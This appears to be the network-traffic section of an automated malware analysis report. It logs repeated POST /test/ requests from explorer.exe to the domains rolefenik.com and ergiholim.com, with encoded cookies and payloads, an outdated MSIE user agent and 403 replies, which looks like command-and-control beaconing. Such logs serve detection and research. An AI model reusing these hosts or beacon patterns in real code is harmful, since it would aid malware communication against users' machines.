                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:37 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:37 UTC754INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:37 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UMlMh02vCQU%2FlII1ulaV2haT7STWruKNjwRC4%2Fw7%2B9ttYl6wUE%2BKBnt4Y0dyASecOQE%2BdGn6ZNVukm1yUcZjIz4y0hZQd9PQ3qvr%2BvXlURCvSbCvdUkd9VIVaFWKoUrM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071e74f26261d-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=159367&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=19117&cwnd=32&unsent_bytes=0&cid=88ab9a15cedb4e4c&ts=836&x=0"
                                                                                                                                          2024-11-13 17:22:37 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          41192.168.2.650034104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:39 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:39 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:40 UTC746INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:40 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NNMlHNXzpfNwQZAx9lMXuoSJ%2BGnRnbXldxWkFOJPK8HQFVAwn8oLiSZ88DDZnMQQ6JIIj0Loy%2BkgZ0qSwm8zWTd0Z1RJGtdl7WOeSqKXNSb2BuyUh1uJbaHLhrP51Yxu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071f82e2ad765-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=130920&sent=4&recv=6&lost=0&retrans=1&sent_bytes=2828&recv_bytes=1167&delivery_rate=22214&cwnd=32&unsent_bytes=0&cid=d534c45c318cfaa6&ts=514&x=0"
                                                                                                                                          2024-11-13 17:22:40 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          42192.168.2.650035104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:41 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:41 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:41 UTC749INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:41 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ENnTiihMrRpFRybnPpJyEoMSGd%2BnF2faMZWuA4G1euuaPmASzKur3lq3B2U1EGNdN97Od1pS1W%2F00Blc5WU76yKXe%2FMU01zUo0RkTKjAQGRbtH11fCjJGvXvHwaIUIzc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071ff4dd42cc2-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1634&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=1754088&cwnd=237&unsent_bytes=0&cid=80d1d0944f5e918d&ts=493&x=0"
                                                                                                                                          2024-11-13 17:22:41 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          43192.168.2.650036104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:42 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:42 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:43 UTC744INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:43 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Icly1E73rBXSNTUncto87nreNkMCmzxbo3fAnS6bkdah65AWJdp3pOif6rSeVodUd78RNEp4jcxjHfBCH%2FtkF0UBiqgxXDA0jvn8Fr7KrscghBUjNlchEHJPMNM2r5Pi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072085ba2e367-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=152031&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=18114&cwnd=32&unsent_bytes=0&cid=22fa5661142b8342&ts=744&x=0"
                                                                                                                                          2024-11-13 17:22:43 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          44192.168.2.650037104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:44 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:44 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:44 UTC758INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:44 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wlGxf%2BGx%2FDm7xhKQsFSkoDUs6HHfZCHK%2BAYx7K9xEnJKoTmMtSXq%2BzJnRwG1wbdDxVPyKnpdD6gov5mv5aZx%2F%2B1q%2F6AMdEZga08auoxynq8nhWRKfcRYIRLwy3sn9y%2F1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207213696650d8-BOD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=114495&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=25300&cwnd=32&unsent_bytes=0&cid=020e660828833674&ts=525&x=0"
                                                                                                                                          2024-11-13 17:22:44 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          45192.168.2.650038104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:45 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:45 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:46 UTC748INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:46 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8irEKmTOZqI9GT1%2Fi4ivCm1%2FktY1QM9j4E058tFjJ0meN69YUCrFbVXJ%2FFKaBb1aYaJKnm2Gsyzy5E0zTukDsKaagc6WoDNnu2tWqXD09KBYnigAheRaAnsFRVb2Ff2y"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20721b88ea685a-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=171015&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20061&cwnd=32&unsent_bytes=0&cid=7a1ede1f5e5229a1&ts=793&x=0"
                                                                                                                                          2024-11-13 17:22:46 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          46192.168.2.650039104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:47 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:47 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:47 UTC743INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:47 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OHaq2CNWANcNurjJGs9Ja4p6dtRPGMa5spfj5lRTwUJyuz71DOdOo6HeirIlMkjM3PKe1s9CqosLR0VE8DdQkonFPMKZGIjQOc9kknnfw0viXYPA%2BZXfjCVvlkQHeMia"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072248c38fa05-SJC
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=41184&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=70223&cwnd=32&unsent_bytes=0&cid=0e647d344df4be39&ts=494&x=0"
